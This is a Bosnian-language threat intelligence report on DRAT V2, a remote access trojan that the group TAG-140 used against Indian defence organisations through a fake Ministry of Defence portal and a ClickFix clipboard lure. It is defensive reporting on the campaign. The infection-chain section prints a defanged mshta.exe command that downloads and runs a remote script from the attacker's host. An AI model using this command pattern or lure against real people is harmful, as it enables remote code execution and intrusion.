Kao značajan napredak u oblasti sajber prijetnji, otkriven je DRAT V2, znatno poboljšani trojanac za daljinski pristup koji ilustruje kontinuirano usavršavanje državnih aktera prijetnji usmjerenih na kritičnu infrastrukturu. Ova najnovija verzija predstavlja strateško preorijentisanje sa prethodne .NET verzije na varijantu sastavljenu u Delphiju, uvodeći proširene mogućnosti komandovanja i upravljanja (C2) koje predstavljaju povećani rizik za vladine i odbrambene organizacije na prostoru Indijskog potkontinenta.
Malver kampanju, koju orkestrira grupa prijetnji TAG-140, poznata po ranijim vezama sa SideCopy i širim ekosistemom Transparent Tribe, odlikovala je izuzetna sofisticiranost u metodologiji ciljanja. Grupa je primijenila složenu šemu socijalnog inženjeringa koja je uključivala kreiranje lažne web stranice koja je oponašala zvanični portal saopštenja za javnost indijskog Ministarstva odbrane, koristeći obmanjujući domen email.gov.in.drdosurvey.info kako bi se maksimalno približila zakonitoj vladinoj web stranici mod.gov.in. Analitičari Recorded Future-a su ovu zlonamjernu infrastrukturu identifikovali tokom svojih istraga o nedavnim aktivnostima TAG-140, otkrivajući pažljivo osmišljen lanac napada koji koristi taktike socijalnog inženjeringa tipa ClickFix.
Kampanja je specifično ciljala indijske odbrambene organizacije putem spearphishing operacija, usmjeravajući žrtve na klonirani portal gdje je samo jedan link za saopštenja za javnost iz marta 2025. godine ostao aktivan, služeći kao primarni vektor infekcije. Tehničke implikacije implementacije DRAT V2 prevazilaze konvencionalne mogućnosti daljinskog pristupa, jer malver uvodi novi `exec_this_comm` komandu koja omogućava proizvoljno izvršavanje komandi ljuske na kompromitovanim sistemima. Ovo poboljšanje značajno povećava fleksibilnost aktera prijetnji nakon eksploatacije, omogućavajući interaktivne operacije u realnom vremenu i sofisticirano lateralno kretanje kroz ciljane mreže.
Prilagođeni C2 protokol malvera baziran na TCP-u, iniciran od strane servera, ažuriran je da podržava i ASCII i Unicode unos, zadržavajući odgovore samo u ASCII formatu, što pokazuje promišljenu ravnotežu između funkcionalnosti i operativne sigurnosti. Pojava DRAT V2 signalizira zabrinjavajuću evoluciju u operativnim sposobnostima TAG-140, posebno imajući u vidu historijski obrazac grupe brzog rotiranja između različitih trojanaca za daljinski pristup, uključujući CurlBack, SparkRAT, AresRAT i druge. Ova strategija diverzifikacije otežava napore za detekciju, istovremeno održavajući uporan pristup visoko vrijednim ciljevima unutar indijskog sektora vlade i odbrane.
Mehanizam infekcije i dostava tereta DRAT V2 lanca infekcije predstavlja primjer modernih tehnika distribucije malvera kroz svoj sofisticirani proces raspoređivanja u više faza. Niz napada započinje kada žrtve pristupe zlonamjernom portalu i kliknu na aktivni link za mart 2025., koji ih preusmjerava na specijalizovani URI `/captcha/windows.php` koji prikazuje obmanjujuće upozorenje označeno kao “Disclosure – For Official Use Only (FOUO)”. Nakon klika na “continue”, zlonamjerni JavaScript izvršava operaciju otmice međuspremnika, kopirajući pažljivo kreiranu komandu u međuspremnik korisnika i instruišući ga da je zalijepi i izvrši u komandnoj ljusci. Komanda koristi ugrađeni Windows alat mshta.exe za preuzimanje i izvršavanje udaljenog skripta iz infrastrukture TAG-140 na adresi trade4wealth.in, kao što je prikazano u sljedećoj strukturi komandi: `C:\Windows\System32\mshta.exe hxxps://trade4wealth[.]in/admin/assets/css/default/index.php`.
Ovo izvršenje pokreće raspoređivanje BroaderAspect učitavača, koji služi kao primarni mehanizam za fazno postavljanje instalacije DRAT V2. Učitavač obavlja više kritičnih funkcija, uključujući preuzimanje lažnog PDF dokumenta radi održavanja iluzije legitimnih aktivnosti, uspostavljanje perzistencije putem manipulacije registra, i na kraju, dohvaćanje komprimovanog DRAT V2 tereta iz infrastrukture aktera prijetnji. Mehanizam perzistencije koristi unos registra unutar lokacije automatskog pokretanja definisane od strane Microsofta, osiguravajući da malver zadrži pristup nakon ponovnog pokretanja sistema, dok se maskira kao legitimna sistemska datoteka kroz pažljivo odabrane konvencije imenovanja i postavljanje datoteka u strukturu direktorijuma C:\Users\Public.
